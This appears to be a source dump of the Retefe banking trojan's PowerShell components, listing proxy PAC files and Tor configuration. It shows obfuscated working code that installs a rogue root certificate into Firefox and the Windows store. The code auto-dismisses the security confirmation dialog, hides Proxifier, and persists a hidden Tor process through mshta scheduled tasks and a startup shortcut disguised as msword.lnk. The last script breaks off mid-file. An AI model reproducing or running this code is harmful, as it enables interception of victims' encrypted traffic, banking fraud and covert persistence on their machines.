├── AddCertFF.ps1 ├── ConfirmCert.ps1 ├── HideProxifier.ps1 ├── InstallTP.ps1 ├── README.md ├── StartWork.ps1 ├── proxy_pac_at.js ├── proxy_pac_ch.js ├── proxy_pac_uk.js ├── retefe.js └── torrc /AddCertFF.ps1: -------------------------------------------------------------------------------- 1 | function fSG{ 2 | Add-Type @" 3 | using System; 4 | using System.IO; 5 | using Microsoft.Win32; 6 | using System.Runtime.InteropServices; 7 | using System.ComponentModel; 8 | 9 | public sealed class AKDzyvJqNEx 10 | { 11 | private static volatile AKDzyvJqNEx wCWjuW; 12 | private static object xlWGzUqr = new Object(); 13 | public static AKDzyvJqNEx iDLm() 14 | { 15 | if (wCWjuW == null) 16 | { 17 | lock (xlWGzUqr) 18 | { 19 | if (wCWjuW == null) 20 | wCWjuW = new AKDzyvJqNEx(); 21 | } 22 | } 23 | return wCWjuW; 24 | } 25 | 26 | const int jJWmEFSUrg=0; 27 | 28 | [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] 29 | static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); 30 | 31 | private static IntPtr AhHdVrRlbznn(string libPath) 32 | { 33 | if (String.IsNullOrEmpty(libPath)) 34 | throw new ArgumentNullException("libPath"); 35 | 36 | IntPtr moduleHandle = LoadLibrary(libPath); 37 | if (moduleHandle == IntPtr.Zero) 38 | { 39 | int lasterror = Marshal.GetLastWin32Error(); 40 | System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror)); 41 | Win32Exception innerEx = new Win32Exception(lasterror); 42 | innerEx.Data.Add("LastWin32Error", lasterror); 43 | throw new Exception("can't load DLL " + libPath, innerEx); 44 | } 45 | return moduleHandle; 46 | } 47 | 48 | [DllImport("kernel32.dll")] 49 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); 50 | //Constants 51 | const uint NSS_INIT_READONLY=0x1; 52 | const uint NSS_INIT_NOCERTDB = 0x2; 53 | const uint NSS_INIT_NOMODDB = 0x4; 54 | const uint NSS_INIT_FORCEOPEN = 0x8; 55 | const uint NSS_INIT_NOROOTINIT = 0x10; 56 | const uint NSS_INIT_OPTIMIZESPACE = 0x20; 57 | const uint NSS_INIT_PK11THREADSAFE = 0x40; 58 | const uint NSS_INIT_PK11RELOAD = 0x80; 59 | const uint NSS_INIT_NOPK11FINALIZE = 0x100; 60 | const uint NSS_INIT_RESERVED = 0x200; 61 | const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_INIT_PK11RELOAD | NSS_INIT_NOPK11FINALIZE | NSS_INIT_RESERVED; 62 | 63 | const string SECMOD_DB = "secmod.db"; 64 | //Structures 65 | [StructLayout(LayoutKind.Sequential)] 66 | public struct SECItem 67 | { 68 | public uint iType; 69 | public IntPtr bData; 70 | public uint iDataLen; 71 | } 72 | 73 | [StructLayout(LayoutKind.Sequential)] 74 | private struct CertTrusts 75 | { 76 | public int iSite; 77 | public int iEmail; 78 | public int iSoft; 79 | } 80 | 81 | private enum SECCertUsage 82 | { 83 | certUsageSSLClient = 0, 84 | certUsageSSLServer = 1, 85 | certUsageSSLServerWithStepUp = 2, 86 | certUsageSSLCA = 3, 87 | certUsageEmailSigner = 4, 88 | certUsageEmailRecipient = 5, 89 | certUsageObjectSigner = 6, 90 | certUsageUserCertImport = 7, 91 | certUsageVerifyCA = 8, 92 | certUsageProtectedObjectSigner = 9, 93 | certUsageStatusResponder = 10, 94 | certUsageAnyCA = 11 95 | } 96 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 97 | private delegate int yWJDeCLMLq(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags); 98 | 99 | private int jYPRadgtrj(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags) 100 | { 101 | IntPtr pProc = GetProcAddress(ayHIt, "NSS_Initialize"); 102 | yWJDeCLMLq ptr = (yWJDeCLMLq)Marshal.GetDelegateForFunctionPointer(pProc, typeof(yWJDeCLMLq)); 103 | return ptr(sConfigDir, certPrefix, keyPrefix, secModName, flags); 104 | } 105 | 106 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 107 | private delegate IntPtr nSBZUtP(); 108 | private IntPtr bqcGhwePBl() 109 | { 110 | IntPtr pProc = GetProcAddress(ayHIt, "CERT_GetDefaultCertDB"); 111 | nSBZUtP ptr = (nSBZUtP)Marshal.GetDelegateForFunctionPointer(pProc, typeof(nSBZUtP)); 112 | return ptr(); 113 | } 114 | 115 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 116 | private delegate IntPtr jkSh(); 117 | private IntPtr XhNd() 118 | { 119 | IntPtr pProc = GetProcAddress(ayHIt, "NSS_Shutdown"); 120 | jkSh ptr = (jkSh)Marshal.GetDelegateForFunctionPointer(pProc, typeof(jkSh)); 121 | return ptr(); 122 | } 123 | 124 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 125 | private delegate int zSWZMpBPdeKCLf(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname); 126 | private int sxiUmINe(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname) 127 | { 128 | IntPtr pProc = GetProcAddress(ayHIt, "CERT_ImportCerts"); 129 | zSWZMpBPdeKCLf ptr = (zSWZMpBPdeKCLf)Marshal.GetDelegateForFunctionPointer(pProc, typeof(zSWZMpBPdeKCLf)); 130 | return ptr(certdb, usage, ncerts, ref derCerts, ref retCerts, keepCerts, caOnly, nickname); 131 | } 132 | 133 | private delegate int iLILRXItsnEHGB(IntPtr certdb, IntPtr cert, ref CertTrusts trust); 134 | private int AHQqjtxHpCK(IntPtr certdb, IntPtr cert, ref CertTrusts trust) 135 | { 136 | IntPtr pProc = GetProcAddress(ayHIt, "CERT_ChangeCertTrust"); 137 | iLILRXItsnEHGB ptr = (iLILRXItsnEHGB)Marshal.GetDelegateForFunctionPointer(pProc, typeof(iLILRXItsnEHGB)); 138 | return ptr(certdb, cert, ref trust); 139 | } 140 | 141 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 142 | public delegate int ljCmZJU(IntPtr cert, uint ncerts); 143 | private int oMDlyjxusWmg(IntPtr cert, uint ncerts) 144 | { 145 | IntPtr pProc = GetProcAddress(ayHIt, "CERT_DestroyCertArray"); 146 | ljCmZJU ptr = (ljCmZJU)Marshal.GetDelegateForFunctionPointer(pProc, typeof(ljCmZJU)); 147 | return ptr(cert, ncerts); 148 | } 149 | 150 | private IntPtr ayHIt = IntPtr.Zero; 151 | 152 | public Boolean vIxFjAGquHNNp(String sCert){ 153 | System.Console.WriteLine(String.Format("AKDzyvJqNEx Start. Process {0}-bit",IntPtr.Size * 8)); 154 | String sProfile = GetProfile(); 155 | if (String.IsNullOrEmpty(sProfile)) 156 | { 157 | System.Console.WriteLine("Profile not found"); 158 | return false; 159 | } 160 | System.Console.WriteLine("Profile path="+sProfile); 161 | byte[] bCert = GetCertAsByteArray(sCert); 162 | IntPtr ipCert = Marshal.AllocHGlobal(bCert.Length); 163 | System.Console.WriteLine("Unpack cert OK"); 164 | try 165 | { 166 | DirectoryInfo diInstallPath = GetIP(); 167 | if (diInstallPath == null) 168 | { 169 | System.Console.WriteLine("diInstallPath is null"); 170 | String ffexe = @"C:\Program Files\Mozilla Firefox\firefox.exe"; 171 | if (File.Exists(ffexe)) 172 | { 173 | diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe)); 174 | System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe)); 175 | } 176 | else 177 | { 178 | ffexe = @"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"; 179 | if (File.Exists(ffexe)) 180 | { 181 | diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe)); 182 | System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe)); 183 | } 184 | } 185 | } 186 | String sCurrentDirectory = Directory.GetCurrentDirectory(); 187 | Directory.SetCurrentDirectory(diInstallPath.FullName); 188 | System.Console.WriteLine("Install path="+diInstallPath.FullName); 189 | foreach(FileInfo fiDll in diInstallPath.GetFiles("*.dll")) 190 | { 191 | if (fiDll.Name.Equals("breakpadinjector.dll")) continue; 192 | try{ 193 | AhHdVrRlbznn(fiDll.FullName); 194 | }catch (Exception ex){ 195 | System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace)); 196 | } 197 | } 198 | ayHIt = AhHdVrRlbznn(diInstallPath.FullName + "\\nss3.dll"); 199 | if (ayHIt.Equals(IntPtr.Zero)) 200 | { 201 | System.Console.WriteLine("Firefox install directory not found"); 202 | return false; 203 | } 204 | System.Console.WriteLine("Init dlls OK"); 205 | Directory.SetCurrentDirectory(sCurrentDirectory); 206 | //Init cert 207 | Marshal.Copy(bCert, 0, ipCert, bCert.Length); 208 | SECItem CertItem = new SECItem(); 209 | CertItem.iType = 3; 210 | CertItem.bData = ipCert; 211 | CertItem.iDataLen = (uint)bCert.Length; 212 | SECItem[] aCertItem = new SECItem[1]; 213 | aCertItem[0] = CertItem; 214 | 215 | CertTrusts CertTrust = new CertTrusts(); 216 | CertTrust.iSite = 0x10; 217 | CertTrust.iEmail = 0x10; 218 | CertTrust.iSoft = 0x10; 219 | System.Console.WriteLine("Init cert OK"); 220 | //End init cert 221 | int status = jYPRadgtrj("sql:"+sProfile, "", "", SECMOD_DB, NSS_INIT_OPTIMIZESPACE); 222 | if (status != jJWmEFSUrg) 223 | { 224 | System.Console.WriteLine(String.Format("NSS_InitReadWrite ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error())); 225 | return false; 226 | } 227 | IntPtr bd = bqcGhwePBl(); 228 | if (bd == IntPtr.Zero) 229 | { 230 | System.Console.WriteLine("CERT_GetDefaultCertDB Failed"); 231 | XhNd(); 232 | return false; 233 | } 234 | System.Console.WriteLine("CERT_GetDefaultCertDB OK"); 235 | IntPtr CertToImport = new IntPtr(); 236 | IntPtr[] aCertToImport = new IntPtr[1]; 237 | status = sxiUmINe(bd, 11, 1, ref aCertItem, ref CertToImport, 1, 0, IntPtr.Zero); 238 | if (status != jJWmEFSUrg) 239 | { 240 | System.Console.WriteLine(String.Format("CERT_ImportCerts ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error())); 241 | XhNd(); 242 | return false; 243 | } 244 | System.Console.WriteLine("CERT_ImportCerts OK"); 245 | Marshal.Copy(CertToImport, aCertToImport, 0, 1); 246 | status = AHQqjtxHpCK(bd, aCertToImport[0], ref CertTrust); 247 | if ( status != jJWmEFSUrg) 248 | { 249 | System.Console.WriteLine(String.Format("CERT_ChangeCertTrust ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error())); 250 | XhNd(); 251 | return false; 252 | }; 253 | System.Console.WriteLine("CERT_ChangeCertTrust OK"); 254 | oMDlyjxusWmg(CertToImport, 1); 255 | System.Console.WriteLine("Add cert OK"); 256 | } 257 | catch (Exception ex){ 258 | System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace)); 259 | } 260 | finally 261 | { 262 | XhNd(); 263 | } 264 | return true; 265 | } 266 | private String GetProfile() 267 | { 268 | String FFProfile = Path.Combine(Environment.GetEnvironmentVariable("APPDATA"), @"Mozilla\Firefox\Profiles"); 269 | if (Directory.Exists(FFProfile)) 270 | { 271 | if (Directory.GetDirectories(FFProfile, "*.default").Length > 0) 272 | { 273 | return Directory.GetDirectories(FFProfile, "*.default")[0]; 274 | } 275 | } 276 | return ""; 277 | } 278 | public byte[] GetCertAsByteArray(String sCert) 279 | { 280 | try 281 | { 282 | return Convert.FromBase64String(sCert); 283 | } 284 | catch (Exception ex){ 285 | System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace)); 286 | } 287 | return null; 288 | } 289 | private DirectoryInfo GetIP() 290 | { 291 | DirectoryInfo fp = null; 292 | // get firefox path from registry 293 | // we'll search the 32bit install location 294 | RegistryKey localMachine1 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Mozilla\Mozilla Firefox", false); 295 | // and lets try the 64bit install location just in case 296 | RegistryKey localMachine2 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox", false); 297 | 298 | if (localMachine1 != null) 299 | { 300 | try 301 | { 302 | string[] installedVersions = localMachine1.GetSubKeyNames(); 303 | // we'll take the first installed version, people normally only have one 304 | if (installedVersions.Length == 0) 305 | throw new IndexOutOfRangeException("No installs of firefox recorded in its key."); 306 | 307 | RegistryKey mainInstall = localMachine1.OpenSubKey(installedVersions[0]); 308 | 309 | // get install directory 310 | string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null); 311 | 312 | if (installString == null) 313 | throw new NullReferenceException("Install string was null"); 314 | 315 | fp = new DirectoryInfo(installString); 316 | } 317 | catch (Exception ex) 318 | { 319 | System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace)); 320 | } 321 | } 322 | else if (localMachine2 != null) 323 | { 324 | try 325 | { 326 | string[] installedVersions = localMachine2.GetSubKeyNames(); 327 | // we'll take the first installed version, people normally only have one 328 | if (installedVersions.Length == 0) 329 | throw new IndexOutOfRangeException("No installs of firefox recorded in its key."); 330 | 331 | RegistryKey mainInstall = localMachine2.OpenSubKey(installedVersions[0]); 332 | 333 | // get install directory 334 | string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null); 335 | 336 | if (installString == null) 337 | throw new NullReferenceException("Install string was null"); 338 | fp = new DirectoryInfo(installString); 339 | } 340 | catch (Exception ex) 341 | { 342 | System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace)); 343 | } 344 | }else{ 345 | System.Console.WriteLine("Registry records not found"); 346 | } 347 | return fp; 348 | } 349 | } 350 | "@; 351 | [AKDzyvJqNEx]::iDLm().vIxFjAGquHNNp("%CERT%"); 352 | } 353 | fSG 354 | -------------------------------------------------------------------------------- /ConfirmCert.ps1: -------------------------------------------------------------------------------- 1 | function aIdOcTDDqwMmmZM{ 2 | Add-Type @" 3 | using System; 4 | using System.Text; 5 | using System.Runtime.InteropServices; 6 | using System.Diagnostics; 7 | using System.Security.Cryptography.X509Certificates; 8 | using System.Threading; 9 | 10 | public static class XhDTrJCKB 11 | { 12 | public class DiUIAiCyMsT 13 | { 14 | public string Wndclass; 15 | public string Title; 16 | public string Process; 17 | public IntPtr hWnd; 18 | } 19 | 20 | private delegate bool qUqomlHBXgcyoBP(IntPtr hWnd, ref DiUIAiCyMsT data); 21 | 22 | [DllImport("user32.dll")] 23 | [return: MarshalAs(UnmanagedType.Bool)] 24 | private static extern bool EnumWindows(qUqomlHBXgcyoBP lpEnumFunc, ref DiUIAiCyMsT data); 25 | 26 | [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] 27 | public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount); 28 | 29 | [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] 30 | public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount); 31 | 32 | [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] 33 | static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); 34 | 35 | [DllImport("user32.dll")] 36 | [return: MarshalAs(UnmanagedType.Bool)] 37 | static extern bool SetForegroundWindow(IntPtr hWnd); 38 | 39 | public delegate bool RjvExDdJW(IntPtr hwnd, IntPtr lParam); 40 | 41 | [DllImport("user32")] 42 | [return: MarshalAs(UnmanagedType.Bool)] 43 | public static extern bool EnumChildWindows(IntPtr window, RjvExDdJW callback, IntPtr lParam); 44 | 45 | [DllImport("user32.dll", CharSet = CharSet.Auto)] 46 | static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam); 47 | 48 | [Flags] 49 | private enum SnapshotFlags : uint 50 | { 51 | HeapList = 0x00000001, 52 | Process = 0x00000002, 53 | Thread = 0x00000004, 54 | Module = 0x00000008, 55 | Module32 = 0x00000010, 56 | Inherit = 0x80000000, 57 | All = 0x0000001F, 58 | NoHeaps = 0x40000000 59 | } 60 | //inner struct used only internally 61 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 62 | private struct PROCESSENTRY32 63 | { 64 | const int MAX_PATH = 260; 65 | internal UInt32 dwSize; 66 | internal UInt32 cntUsage; 67 | internal UInt32 th32ProcessID; 68 | internal IntPtr th32DefaultHeapID; 69 | internal UInt32 th32ModuleID; 70 | internal UInt32 cntThreads; 71 | internal UInt32 th32ParentProcessID; 72 | internal Int32 pcPriClassBase; 73 | internal UInt32 dwFlags; 74 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)] 75 | internal string szExeFile; 76 | } 77 | 78 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 79 | static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID); 80 | 81 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 82 | static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 83 | 84 | [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)] 85 | static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe); 86 | 87 | [DllImport("kernel32", SetLastError = true)] 88 | [return: MarshalAs(UnmanagedType.Bool)] 89 | private static extern bool CloseHandle([In] IntPtr hObject); 90 | 91 | const int eiNVCUNq = 0x00F5; 92 | 93 | public static byte[] XcAOFYFul(String sCert) 94 | { 95 | return Convert.FromBase64String(sCert); 96 | } 97 | 98 | public static void jOnkzDLSQi(String sCert){ 99 | System.Console.WriteLine("[Win32]::Start()"); 100 | byte[] bCert = XcAOFYFul(sCert); 101 | if (bCert != null) 102 | { 103 | X509Certificate2 certificate = new X509Certificate2(bCert); 104 | X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); 105 | store.Open(OpenFlags.ReadWrite); 106 | if (!store.Certificates.Contains(certificate)) 107 | { 108 | Thread thread = new Thread(LicvpD); 109 | thread.Start(); 110 | store.Add(certificate); 111 | thread.Join(); 112 | } 113 | store.Close(); 114 | } 115 | } 116 | 117 | public static void LicvpD() 118 | { 119 | System.Console.WriteLine("[Win32]::SearchDialog()"); 120 | IntPtr hWnd; 121 | do{ 122 | hWnd = tsnm("#32770",String.Empty); 123 | if (!hWnd.Equals(IntPtr.Zero)) 124 | { 125 | System.Console.WriteLine("Founded hWnd=0x{0:X}",hWnd); 126 | break; 127 | }else 128 | { 129 | hWnd=IntPtr.Zero; 130 | System.Console.WriteLine("Try again find window"); 131 | } 132 | }while (hWnd.Equals(IntPtr.Zero)); 133 | System.Console.WriteLine("Dialog window founded"); 134 | SetForegroundWindow(hWnd); 135 | RjvExDdJW childProc = new RjvExDdJW(zNl); 136 | EnumChildWindows(hWnd, childProc, IntPtr.Zero); 137 | } 138 | 139 | public static IntPtr tsnm(string wndclass, string title) 140 | { 141 | DiUIAiCyMsT sd = new DiUIAiCyMsT(); 142 | sd.Wndclass = wndclass; 143 | sd.Title = title; 144 | sd.hWnd=IntPtr.Zero; 145 | System.Console.WriteLine("EnumWindow -|"); 146 | EnumWindows(new qUqomlHBXgcyoBP(PuaZoLoCJp), ref sd); 147 | return sd.hWnd; 148 | } 149 | 150 | public static bool PuaZoLoCJp(IntPtr hWnd, ref DiUIAiCyMsT data) 151 | { 152 | StringBuilder title = new StringBuilder(1024); 153 | StringBuilder className = new StringBuilder(1024); 154 | GetWindowText(hWnd, title, title.Capacity); 155 | GetClassName(hWnd, className, className.Capacity); 156 | String sEN=wNO(hWnd).ToLower(); 157 | if((!data.Wndclass.Equals(String.Empty) && className.ToString().StartsWith(data.Wndclass)) || (!data.Title.Equals(String.Empty) && title.ToString().StartsWith(data.Title))) 158 | { 159 | System.Console.WriteLine(" |- hWnd=0x{0:X}; Class={1}; Title={2}; Process={3}",hWnd,className.ToString(),title.ToString(),sEN); 160 | if(sEN.Contains("csrss") || sEN.Contains("certutil") || sEN.Contains("powershell")) 161 | { 162 | data.hWnd = hWnd; 163 | return false; 164 | } 165 | } 166 | 167 | return true; 168 | } 169 | 170 | public static String wNO(IntPtr ClNxUgg){ 171 | uint nuqJeEMvnxpQ = 0; 172 | uint threadID = GetWindowThreadProcessId(ClNxUgg, out nuqJeEMvnxpQ); 173 | String sProc = null; 174 | IntPtr handleToSnapshot = IntPtr.Zero; 175 | try 176 | { 177 | PROCESSENTRY32 WMaTr = new PROCESSENTRY32(); 178 | WMaTr.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32)); 179 | handleToSnapshot = CreateToolhelp32Snapshot((uint)SnapshotFlags.Process, 0); 180 | if (Process32First(handleToSnapshot, ref WMaTr)) 181 | { 182 | do 183 | { 184 | if (nuqJeEMvnxpQ == WMaTr.th32ProcessID) 185 | { 186 | sProc = WMaTr.szExeFile; 187 | break; 188 | } 189 | } while (Process32Next(handleToSnapshot, ref WMaTr)); 190 | } 191 | else 192 | { 193 | throw new ApplicationException(string.Format("Failed with win32 error code {0}", Marshal.GetLastWin32Error())); 194 | } 195 | } 196 | catch (Exception ex) 197 | { 198 | throw new ApplicationException("Can't get the process.", ex); 199 | } 200 | finally 201 | { 202 | CloseHandle(handleToSnapshot); 203 | } 204 | return sProc; 205 | } 206 | public static bool zNl(IntPtr ClNxUgg, IntPtr lParam) 207 | { 208 | SendMessage(ClNxUgg, eiNVCUNq, IntPtr.Zero, IntPtr.Zero); 209 | return true; 210 | } 211 | } 212 | "@; 213 | [XhDTrJCKB]::jOnkzDLSQi("%CERT%"); 214 | exit 215 | } 216 | aIdOcTDDqwMmmZM 217 | -------------------------------------------------------------------------------- /HideProxifier.ps1: -------------------------------------------------------------------------------- 1 | # Add a native method "ShowWindow" from user32.dll 2 | Add-Type -name win -member '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);' -namespace native; 3 | 4 | # Hide this process window 5 | #[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); 6 | 7 | # Start the application to be hidden 8 | Start-Process -WindowStyle hidden -FilePath "C:\Users\User\AppData\Roaming\TP\p\Proxifier.exe"; 9 | 10 | # Wait a few seconds 11 | Start-Sleep -m 500; 12 | 13 | # Hide the started application 14 | [native.win]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName("proxifier")| Get-Process).MainWindowHandle, 0); 15 | -------------------------------------------------------------------------------- /InstallTP.ps1: -------------------------------------------------------------------------------- 1 | $SH_TYPE_SCHEDULED_TASK=1; 2 | $SH_TYPE_TASK_SCHEDULER=2; 3 | $schedulerType=$SH_TYPE_SCHEDULED_TASK; 4 | function Base64ToFile 5 | { 6 | param([string]$file, [string]$string); 7 | $bytes=[System.Convert]::FromBase64String($string); 8 | [IO.File]::WriteAllBytes($file, $bytes); 9 | } 10 | function IgewPfCUf 11 | { 12 | param([string]$zipfile, [string]$destination); 13 | $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe'; 14 | if ($(Try { Test-Path $7z.trim() } Catch { $false })){ 15 | Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow 16 | } 17 | else{ 18 | $shell = new-object -com shell.application; 19 | $zip = $shell.NameSpace($zipfile); 20 | foreach($item in $zip.items()) 21 | { 22 | $shell.Namespace($destination).copyhere($item); 23 | } 24 | } 25 | } 26 | 27 | function Add-Shortcut{ 28 | param([string]$target_path, [string]$dest_path, [string]$work_path, [string]$arguments=""); 29 | 30 | $_path=Split-Path $dest_path; 31 | if (-Not (Test-Path $_path)){ 32 | mkdir -Force $_path; 33 | } 34 | if (-Not (Test-Path $target_path)){ 35 | Write-Output "Can't add shortcut. Target path '$target_path' not found."; 36 | return; 37 | } 38 | if ((Test-Path $dest_path)){ 39 | Write-Output "Can't add shortcut. Destination path '$dest_path' exist."; 40 | return; 41 | } 42 | 43 | $_shell = New-Object -ComObject ("WScript.Shell"); 44 | $_shortcut = $_shell.CreateShortcut($dest_path); 45 | $_shortcut.TargetPath=$target_path; 46 | if(-Not [String]::IsNullOrEmpty($arguments)){ 47 | $_shortcut.Arguments=$arguments; 48 | } 49 | $_shortcut.WorkingDirectory=$work_path; 50 | $_shortcut.Save(); 51 | } 52 | 53 | function RandomString{ 54 | param([int]$min=5, [int]$max=15); 55 | return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_})); 56 | } 57 | function InitScheduller{ 58 | try{ 59 | Import-Module ScheduledTasks -ErrorAction Stop; 60 | return $SH_TYPE_SCHEDULED_TASK; 61 | }catch{ 62 | $File=$env:ALLUSERSPROFILE+'\ts.7z'; 63 | $Dest=$env:ALLUSERSPROFILE+'\'+(RandomString); 64 | if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null; 65 | IgewPfCUf $File $Dest; 66 | Remove-Item -Force $File; 67 | $TSAssembly=$Dest+'\Microsoft.Win32.TaskScheduler.dll'; 68 | $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly); 69 | return $SH_TYPE_TASK_SCHEDULER; 70 | } 71 | } 72 | function BmruWvxEDIoNRA 73 | { 74 | param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir=''); 75 | switch ($schedulerType) { 76 | $SH_TYPE_SCHEDULED_TASK { 77 | try{ 78 | $Action = New-ScheduledTaskAction -Execute $cmd; 79 | if(-Not [String]::IsNullOrEmpty($params)){ 80 | $Action.Arguments=$params; 81 | } 82 | if(-Not [String]::IsNullOrEmpty($dir)){ 83 | $Action.WorkingDirectory=$dir; 84 | } 85 | $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn; 86 | try{ 87 | $LogonTrigger.UserId=$env:username; 88 | }catch{ 89 | $LogonTrigger.User=$env:username; 90 | } 91 | if(-Not $delay -eq 0){ 92 | $LogonTrigger.Delay=New-TimeSpan -Seconds $delay; 93 | } 94 | if($restart -eq 1){ 95 | $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20)); 96 | } 97 | $Settings = New-ScheduledTaskSettingsSet; 98 | $Settings.DisallowStartIfOnBatteries = $False; 99 | $Settings.StopIfGoingOnBatteries = $False; 100 | if($restart -eq 1){ 101 | $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString); 102 | }else{ 103 | $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString); 104 | } 105 | Start-ScheduledTask -InputObject $Task; 106 | }catch { 107 | Write-Error $_ -ErrorAction Continue; 108 | } 109 | }; 110 | Default { 111 | try{ 112 | $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService; 113 | $td=$ts.NewTask(); 114 | $td.RegistrationInfo.Description = (RandomString); 115 | $td.Settings.DisallowStartIfOnBatteries = $False; 116 | $td.Settings.StopIfGoingOnBatteries = $False; 117 | $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew; 118 | $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger; 119 | $LogonTrigger.StartBoundary=[System.DateTime]::Now; 120 | $LogonTrigger.UserId=$env:username; 121 | $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay); 122 | $td.Triggers.Add($LogonTrigger); 123 | if($restart -eq 1){ 124 | $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger; 125 | $TimeTrigger.StartBoundary=[System.DateTime]::Now; 126 | $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1); 127 | $TimeTrigger.Repetition.StopAtDurationEnd=$False; 128 | $td.Triggers.Add($TimeTrigger); 129 | } 130 | $tsf="Microsoft.Win32.TaskScheduler"; 131 | $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir); 132 | $td.Actions.Add($ExecAction); 133 | $task=$ts.RootFolder.RegisterTaskDefinition($name, $td); 134 | $task.Run(); 135 | }catch { 136 | Write-Error $_ -ErrorAction Continue; 137 | } 138 | }; 139 | } 140 | } 141 | function uPFITobIk{ 142 | $schedulerType = InitScheduller; 143 | $tf=$env:ALLUSERSPROFILE+'\tor-win32-0.3.3.9.7z'; 144 | $DestTP=$env:ALLUSERSPROFILE+'\'+(RandomString); 145 | if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null; 146 | IgewPfCUf $tf $DestTP; 147 | Remove-Item -Force $tf; 148 | $ulpNPMidu=$DestTP+'\Tor\'; 149 | $UNnYtHxrOZVK="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))"; 150 | BmruWvxEDIoNRA (RandomString) 'mshta.exe' $UNnYtHxrOZVK 0 0 $ulpNPMidu; 151 | 152 | Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\msword.lnk" $vzfkFcawDbIUSya $toawwyJljC 153 | 154 | 